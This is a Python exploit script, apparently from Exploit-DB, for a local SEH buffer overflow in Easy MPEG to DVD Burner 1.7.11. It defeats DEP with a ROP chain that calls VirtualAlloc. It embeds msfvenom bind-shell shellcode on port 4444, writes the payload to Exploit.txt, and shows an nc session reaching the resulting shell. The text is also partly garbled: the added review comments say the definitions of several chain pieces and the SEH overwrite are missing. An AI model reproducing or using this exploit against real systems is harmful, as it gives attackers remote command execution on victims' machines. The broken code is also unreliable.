#!/usr/bin/python
#------------------------------------------------------------------------------------------------------------------------------------#
# Exploit: Easy MPEG to DVD Burner 1.7.11 SEH + DEP Bypass Local Buffer Overflow #
# Date: 2018-05-19 #
# Author: Juan Prescotto #
# Tested Against: Win7 Pro SP1 64 bit #
# Software Download #1: https://downloads.tomsguide.com/MPEG-Easy-Burner,0301-10418.html #
# Software Download #2: https://www.exploit-db.com/apps/32dc10d6e60ceb4d6e57052b6de3a0ba-easy_mpeg_to_dvd.exe #
# Version: 1.7.11 #
# Special Thanks to my wife for allowing me to spend countless hours on this passion of mine #
# Credit: Thanks to Marwan Shamel (https://www.exploit-db.com/exploits/44565/) for his work on the original SEH exploit #
# Steps : Open the APP > click on register > Username field > paste in contents from the .txt file that was generated by this script #
#------------------------------------------------------------------------------------------------------------------------------------#
# Bad Characters: \x00\x0a\x0d #
# SEH Offset: 1012 #
# Non-Participating Modules: SkinMagic.dll & Easy MPEG to DVD Burner.exe #
#------------------------------------------------------------------------------------------------------------------------------------#
# root@kali:~/Desktop# nc -nv 10.0.1.14 4444 #
# (UNKNOWN) [10.0.1.14] 4444 (?) open #
# Microsoft Windows [Version 6.1.7601] #
# Copyright (c) 2009 Microsoft Corporation. All rights reserved.
# # # # C:\Program Files (x86)\Easy MPEG to DVD Burner> # #------------------------------------------------------------------------------------------------------------------------------------# # My register setup when VirtualAlloc() is called (Defeat DEP) : #-------------------------------------------- # EAX = Points to PUSHAD at time VirtualAlloc() is called (Stack Pivot jumps over it on return) # ECX = flProtect (0x40) # EDX = flAllocationType (0x1000) # EBX = dwSize (0x01) # ESP = lpAddress (automatic) # EBP = ReturnTo (stack pivot into a rop nop / jmp esp) # ESI = ptr to VirtualAlloc() # EDI = ROP NOP (RETN) import struct def create_rop_chain(): rop_gadgets = [ #***START VirtualAlloc() to ESI*** 0x10027e6b, # POP EAX # RETN [SkinMagic.dll] ** 0x1003b1d4, # ptr to &VirtualAlloc() [IAT SkinMagic.dll] 0x100369a1, # MOV EAX,DWORD PTR DS:[EAX] # RETN [SkinMagic.dll] 0x10032993, # POP EBX # RETN [SkinMagic.dll] 0xffffffff, # 0x10037bd3, # INC EBX # FPATAN # RETN [SkinMagic.dll] 0x10037bd3, # INC EBX # FPATAN # RETN [SkinMagic.dll] 0x10037bc0, # POP EDX # RETN [SkinMagic.dll] 0xffffffff, # 0x10035a07, # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+8] # RETN [SkinMagic.dll] 0x10037654, # POP EAX # RETN [SkinMagic.dll] 0xa141dffb, # 0x100317c8, # ADD EAX,5EFFC883 # RETN [SkinMagic.dll] Gets us to #0x0041a87e # ADD EDX,EBX # POP EBX # RETN 0x10 [Easy MPEG to DVD Burner.exe] 0x1003248d, # PUSH EAX # RETN [SkinMagic.dll] | Calls #0x0041a87e # ADD EDX,EBX # POP EBX # RETN 0x10 [Easy MPEG to DVD Burner.exe] 0x41414141, # FILLER 0x1003993e, # PUSH EDX # ADD AL,5F # POP ESI # POP EBX # RETN 0x0C [SkinMagic.dll] 0x41414141, # FILLER 0x41414141, # FILLER 0x41414141, # FILLER 0x41414141, # FILLER 0x41414141, # FILLER #***END VirtualAlloc() to ESI*** #***START 0x40 to ECX*** 0x100185fb, # XOR EAX,EAX # RETN [SkinMagic.dll] 0x41414141, # FILLER 0x41414141, # FILLER 0x41414141, # FILLER 0x10037c5b, # ADD EAX,40 # POP EBP # RETN [SkinMagic.dll] 0x41414141, # FILLER 0x10032176, # XCHG 
EAX,ECX # ADD EAX,20835910 # ADD BYTE PTR DS:[ECX+10059130],AH # MOV DWORD PTR DS:[1005912C],EAX # RETN [SkinMagic.dll] #***END 0x40 to ECX*** #***START 0x1000 to EDX*** 0x10032993, # POP EBX # RETN [SkinMagic.dll] 0xaaaaaaaa, # 0x10037bc0, # POP EDX # RETN [SkinMagic.dll] 0x55556556, # 0x10037654, # POP EAX # RETN [SkinMagic.dll] 0xa141dffb, # 0x100317c8, # ADD EAX,5EFFC883 # RETN [SkinMagic.dll] Gets us to #0x0041a87e # ADD EDX,EBX # POP EBX # RETN 0x10 [Easy MPEG to DVD Burner.exe] 0x1003248d, # PUSH EAX # RETN [SkinMagic.dll] | Calls #0x0041a87e # ADD EDX,EBX # POP EBX # RETN 0x10 [Easy MPEG to DVD Burner.exe] 0x41414141, # FILLER #***END 0x1000 to EDX*** #*** Start EBP = ReturnTo (stack pivot into a rop nop / jmp esp)*** 0x1002829d, # POP EBP # RETN [SkinMagic.dll] 0x41414141, # FILLER 0x41414141, # FILLER 0x41414141, # FILLER 0x41414141, # FILLER 0x100284f8, # {pivot 16 / 0x10} : # ADD ESP,0C # POP EBP # RETN [SkinMagic.dll] #*** END EBP = ReturnTo (stack pivot into a rop nop / jmp esp)*** #***START 0x1 to EBX*** 0x10032993, # POP EBX # RETN [SkinMagic.dll] 0xffffffff, # 0x10037bd3, # INC EBX # FPATAN # RETN [SkinMagic.dll] 0x10037bd3, # INC EBX # FPATAN # RETN [SkinMagic.dll] #***END 0x1 to EBX*** #***START ROP NOP to EDI*** 0x100342f0, # POP EDI # RETN [SkinMagic.dll] 0x10032158, # RETN (ROP NOP) [SkinMagic.dll] #***END ROP NOP to EDI*** #***START Gadgets to execute PUSHAD / Execute VirtualAlloc()*** 0x10037654, # POP EAX # RETN [SkinMagic.dll] 0xa140acd2, # CONSTANT 0x100317c8, # ADD EAX,5EFFC883 # RETN [SkinMagic.dll] (Puts location of a PUSHAD into EAX "0x00407555", # PUSHAD # RETN [Easy MPEG to DVD Burner.exe] 0x1003248d, # PUSH EAX # RETN [SkinMagic.dll] | Calls #0x00407555, # PUSHAD # RETN [Easy MPEG to DVD Burner.exe] #***END Gadgets to execute PUSHAD*** #***After Return from VirtualAlloc() / stack pivot land in ROP NOP Sled / jmp ESP --> Execute Shellcode*** 0x10032158, # RETN (ROP NOP) [SkinMagic.dll] 0x10032158, # RETN (ROP NOP) [SkinMagic.dll] 
0x10032158, # RETN (ROP NOP) [SkinMagic.dll]
        0x10032158, # RETN (ROP NOP) [SkinMagic.dll]
        0x1001cc57, # & push esp # ret [SkinMagic.dll]
    ]
    # NOTE(review): the text between the pack() format string and "rop_chain) :" was
    # lost in extraction (an HTML-tag-like "<...>" span). The pack format, the end of
    # this return statement, and the definitions of nop_rop_chain_1, nop_rop_chain_2
    # and seh that the payload assembly below relies on are not visible on this page.
    return ''.join(struct.pack(' rop_chain) : # POP EDI # POP ESI # POP EBP # MOV DWORD PTR FS:[0],ECX # POP EBX # ADD ESP,778 # RETN [Easy MPEG to DVD Burner.exe]

# Payload assembly: builds the crafted Username string and writes it to Exploit.txt
# (see "Steps" in the file header).
nop = "\x90" * 20  # 20 single-byte NOPs placed directly before the shellcode
# Max Space Available for Shellcode = 600 bytes
#------------------------------------------------------------------------------------#
# msfvenom -p windows/shell_bind_tcp LPORT=4444 -b '\x00\x0a\x0d' -f py -v shellcode #
# x86/shikata_ga_nai succeeded with size 355 (iteration=0)                            #
#------------------------------------------------------------------------------------#
# Encoded payload as emitted by the msfvenom command above. The literal below
# assembles to 355 bytes (29 lines of 12 plus a final 7), matching the reported
# size. The bytes are opaque here; per the command line they are a shikata_ga_nai
# encoded TCP bind shell on port 4444, built to avoid the three bad characters
# listed in the header.
shellcode = ""
shellcode += "\xb8\x50\x08\x0f\xf2\xd9\xe9\xd9\x74\x24\xf4\x5b"
shellcode += "\x29\xc9\xb1\x53\x31\x43\x12\x03\x43\x12\x83\x93"
shellcode += "\x0c\xed\x07\xef\xe5\x73\xe7\x0f\xf6\x13\x61\xea"
shellcode += "\xc7\x13\x15\x7f\x77\xa4\x5d\x2d\x74\x4f\x33\xc5"
shellcode += "\x0f\x3d\x9c\xea\xb8\x88\xfa\xc5\x39\xa0\x3f\x44"
shellcode += "\xba\xbb\x13\xa6\x83\x73\x66\xa7\xc4\x6e\x8b\xf5"
shellcode += "\x9d\xe5\x3e\xe9\xaa\xb0\x82\x82\xe1\x55\x83\x77"
shellcode += "\xb1\x54\xa2\x26\xc9\x0e\x64\xc9\x1e\x3b\x2d\xd1"
shellcode += "\x43\x06\xe7\x6a\xb7\xfc\xf6\xba\x89\xfd\x55\x83"
shellcode += "\x25\x0c\xa7\xc4\x82\xef\xd2\x3c\xf1\x92\xe4\xfb"
shellcode += "\x8b\x48\x60\x1f\x2b\x1a\xd2\xfb\xcd\xcf\x85\x88"
shellcode += "\xc2\xa4\xc2\xd6\xc6\x3b\x06\x6d\xf2\xb0\xa9\xa1"
shellcode += "\x72\x82\x8d\x65\xde\x50\xaf\x3c\xba\x37\xd0\x5e"
shellcode += "\x65\xe7\x74\x15\x88\xfc\x04\x74\xc5\x31\x25\x86"
shellcode += "\x15\x5e\x3e\xf5\x27\xc1\x94\x91\x0b\x8a\x32\x66"
shellcode += "\x6b\xa1\x83\xf8\x92\x4a\xf4\xd1\x50\x1e\xa4\x49"
shellcode += "\x70\x1f\x2f\x89\x7d\xca\xda\x81\xd8\xa5\xf8\x6c"
shellcode += "\x9a\x15\xbd\xde\x73\x7c\x32\x01\x63\x7f\x98\x2a"
shellcode += "\x0c\x82\x23\x45\x91\x0b\xc5\x0f\x39\x5a\x5d\xa7"
shellcode += "\xfb\xb9\x56\x50\x03\xe8\xce\xf6\x4c\xfa\xc9\xf9"
shellcode += "\x4c\x28\x7e\x6d\xc7\x3f\xba\x8c\xd8\x15\xea\xd9"
shellcode += "\x4f\xe3\x7b\xa8\xee\xf4\x51\x5a\x92\x67\x3e\x9a"
shellcode += "\xdd\x9b\xe9\xcd\x8a\x6a\xe0\x9b\x26\xd4\x5a\xb9"
shellcode += "\xba\x80\xa5\x79\x61\x71\x2b\x80\xe4\xcd\x0f\x92"
shellcode += "\x30\xcd\x0b\xc6\xec\x98\xc5\xb0\x4a\x73\xa4\x6a"
shellcode += "\x05\x28\x6e\xfa\xd0\x02\xb1\x7c\xdd\x4e\x47\x60"
shellcode += "\x6c\x27\x1e\x9f\x41\xaf\x96\xd8\xbf\x4f\x58\x33"
shellcode += "\x04\x7f\x13\x19\x2d\xe8\xfa\xc8\x6f\x75\xfd\x27"
shellcode += "\xb3\x80\x7e\xcd\x4c\x77\x9e\xa4\x49\x33\x18\x55"
shellcode += "\x20\x2c\xcd\x59\x97\x4d\xc4"
# Final buffer layout, left to right:
#   nop_rop_chain_1 | nop_rop_chain_2 | rop_chain | nop | shellcode | "A" padding | seh
# The padding count is 1012 minus the lengths of everything before it, so seh lands
# at the 1012-byte SEH offset noted in the header. Nothing checks that the pieces
# fit: if they exceed 1012 bytes the multiplier is negative, "\x41" * n yields "",
# and seh is appended at the wrong offset without any error.
# NOTE(review): nop_rop_chain_1, nop_rop_chain_2, rop_chain and seh are not defined
# anywhere in the visible text (their definitions fall in the garbled span above),
# so the script does not run as shown on this page.
exploit = nop_rop_chain_1 + nop_rop_chain_2 + rop_chain + nop + shellcode + "\x41" * (1012-len(nop_rop_chain_1)-len(nop_rop_chain_2)-len(rop_chain)-len(nop)-len(shellcode)) + seh
# Written in text mode from a str payload: this relies on Python 2 str-as-bytes
# semantics (the shebang is /usr/bin/python). NOTE(review): under Python 3 the
# text layer would re-encode the \x80-\xff escapes -- confirm the intended
# interpreter. The handle is closed explicitly rather than via a with-block.
f = open ("Exploit.txt", "w")
f.write(exploit)
f.close()